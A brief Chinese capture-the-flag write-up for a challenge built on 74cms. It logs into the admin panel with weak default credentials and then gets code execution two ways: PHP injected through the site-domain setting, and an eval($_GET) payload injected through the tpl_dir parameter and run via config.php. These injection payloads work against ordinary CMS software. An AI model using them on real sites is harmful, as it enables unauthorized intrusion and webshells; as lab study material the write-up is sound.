骑士cms01--WP
#骑士cms01打开划到最底下发现是74cms

百度一下很多getshell的办法选一个
http: //127.0.0.1/index.php?m=Admin
访问后台发现需要登陆,尝试使用admin 123456发现错误然后在尝试admin ;admin发现成功登陆,

将网站域名修改
http://127.0.0.1/.',phpinfo(),'/.com
再次刷新得到phpinfo()页面

搜索qsnctf得到flag
再来一个解法

http: //127.0.0.1/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',eval($_GET),'

http: //127.0.0.1/Application/Home/Conf/config.php?1=phpinfo();
搜索qsnctf即可得到flag
页:
[1]